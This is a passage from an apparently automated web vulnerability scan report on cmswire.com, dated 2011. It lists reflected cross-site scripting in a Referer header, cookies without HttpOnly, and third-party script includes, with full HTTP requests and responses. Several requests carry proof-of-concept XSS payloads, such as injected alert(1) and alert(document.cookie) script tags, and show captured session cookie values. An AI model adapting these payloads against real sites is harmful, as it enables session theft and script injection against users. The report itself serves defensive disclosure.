                           BitlyClient.shorten("http://www.google.com/search?hl=en&q=45584"-alert(1)-"da1f862d9b6?utm_source=internal&utm_medium=web_tell-a-friend&utm_content=&utm_campaign=Internal_TAF", "BitlyCB.myShortenCallback");
                       });
           </script>
...[SNIP]...

2.8. http://www.cmswire.com/taf.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /taf.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript rest-of-line comment. The payload 30825</script><script>alert(1)</script>533f0caa87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /taf.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;
Referer: http://www.google.com/search?hl=en&q=30825</script><script>alert(1)</script>533f0caa87

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:57:20 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6697
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Tell a Friend - CMS
...[SNIP]...
                       break;
                       }
                       document.getElementById('hdnBitlyUrl').value = result['shortUrl'];
                       //alert("Just set result: " +result['shortUrl'] +" from:\n\n" +'http://www.google.com/search?hl=en&q=30825</script><script>alert(1)</script>533f0caa87?utm_source=internal&utm_medium=web_tell-a-friend&utm_content=&utm_campaign=Internal_TAF');
                   }
   
                   // wait until page is loaded to call API
                   BitlyClient.addPageLoadEvent(function(){
                           B
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.cmswire.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cmswire.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma_a2a=8244481635.1331853788.1300296862.1300297703.1300299074.8; __utmz=97231501.1300306754.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/52; __utma=97231501.762556402.1300296844.1300296844.1300306754.2; __utmc=97231501; __utmb=97231501.1.10.1300306754

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 21:20:59 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=9933730ad46990ceb7d1345048ffbdbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 93954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

3.2. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=73005cb99786d2fbcaaa58fa1766ff37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74144


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

4. Cross-domain script include  previous  next
There are 9 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www.cmswire.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300297286.2; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.7.9.1300297287645

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:48:41 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 93626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</p>
    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.2. http://www.cmswire.com/click/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /click/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /click/ HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:56:48 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 904
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Leaving CMSWire.com...</title>
</head>
<body>
   <script t
...[SNIP]...
</script>
   <script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.3. http://www.cmswire.com/cms/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/products/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cms/products/ HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; _chartbeat2=apb3rd0a0c5d4seu; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.4.9.1300297280192

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:43:05 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 124226


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</p>
    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.4. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: PHPSESSID=73005cb99786d2fbcaaa58fa1766ff37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74144


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</a>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.5. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(%22XSS%22)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297638.1300297654.5; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.13.9.1300297655036; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=357e34b1c72c1afb44691f96606e9ab0

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:50:43 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</a>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.6. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(1)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297622.1300297638.4; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.11.9.1300297639377; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=25bb5b81fec0a1e1787dbfef4542d454

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:50:39 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</a>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.7. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364 HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Referer: http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; __utma_a2a=8244481635.1331853788.1300296862.1300297286.1300297622.3; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.9.9.1300297623392; _chartbeat2=apb3rd0a0c5d4seu; PHPSESSID=8c71c449e1fe16bcb109725e089be352

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:50:39 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 75194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
<!-- GAM -->
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.6.0/build/fonts/fonts-min.css&amp;2.6.0/build/container/assets/skins/sam/container.css" />
   <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.6.0/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.6.0/build/animation/animation-min.js&amp;2.6.0/build/connection/connection-min.js&amp;2.6.0/build/dragdrop/dragdrop-min.js&amp;2.6.0/build/container/container-min.js"></script>
   <!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
</a>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
